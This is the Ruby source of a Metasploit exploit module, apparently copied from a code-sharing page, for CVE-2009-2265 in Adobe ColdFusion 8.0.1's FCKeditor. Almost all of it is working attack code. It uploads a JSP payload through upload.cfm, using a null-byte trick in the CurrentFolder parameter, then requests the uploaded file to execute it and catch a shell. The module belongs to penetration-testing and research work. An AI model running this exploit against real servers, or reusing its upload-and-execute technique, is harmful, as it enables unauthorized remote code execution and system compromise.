Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'ColdFusion 8.0.1 Arbitrary File Upload and Execute',
14
      'Description'    => %q{
15
          This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload
16
        and Execute vulnerability.
17
      },
18
      'Author'         => [ 'MC' ],
19
      'License'        => MSF_LICENSE,
20
      'Platform'       => 'win',
21
      'Privileged'     => true,
22
      'References'     =>
23
        [
24
          [ 'CVE', '2009-2265' ],
25
          [ 'OSVDB', '55684'],
26
        ],
27
      'Targets'        =>
28
        [
29
          [ 'Universal Windows Target',
30
            {
31
              'Arch'     => ARCH_JAVA,
32
              'Payload'  =>
33
                {
34
                  'DisableNops' => true,
35
                },
36
            }
37
          ],
38
        ],
39
      'DefaultOptions' =>
40
        {
41
          'SHELL' => 'cmd.exe'
42
        },
43
      'DefaultTarget'  => 0,
44
      'DisclosureDate' => '2009-07-03'
45
    ))
46

47
    register_options(
48
      [
49
        OptString.new('FCKEDITOR_DIR', [ false, 'The path to upload.cfm ', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm' ]),
50
      ])
51
  end
52

53
  def exploit
54

55
    page  = rand_text_alpha_upper(rand(10) + 1) + ".jsp"
56

57
    dbl = Rex::MIME::Message.new
58
    dbl.add_part(payload.encoded, "application/x-java-archive", nil, "form-data; name=\"newfile\"; filename=\"#{rand_text_alpha_upper(8)}.txt\"")
59
    file = dbl.to_s
60
    file.strip!
61

62
    print_status("Sending our POST request...")
63

64
    res = send_request_cgi(
65
      {
66
        'uri'		=> normalize_uri(datastore['FCKEDITOR_DIR']),
67
        'query'		=> "Command=FileUpload&Type=File&CurrentFolder=/#{page}%00",
68
        'version'	=> '1.1',
69
        'method'	=> 'POST',
70
        'ctype'		=> 'multipart/form-data; boundary=' + dbl.bound,
71
        'data'		=> file,
72
      }, 5)
73

74
    if ( res and res.code == 200 and res.body =~ /OnUploadCompleted/ )
75
      print_status("Upload succeeded! Executing payload...")
76

77
      send_request_raw(
78
        {
79
          # default path in Adobe ColdFusion 8.0.1.
80
          'uri'		=> '/userfiles/file/' + page,
81
          'method'	=> 'GET',
82
        }, 5)
83

84
      handler
85
    else
86
      print_error("Upload Failed...")
87
      return
88
    end
89

90
  end
91
end
92

93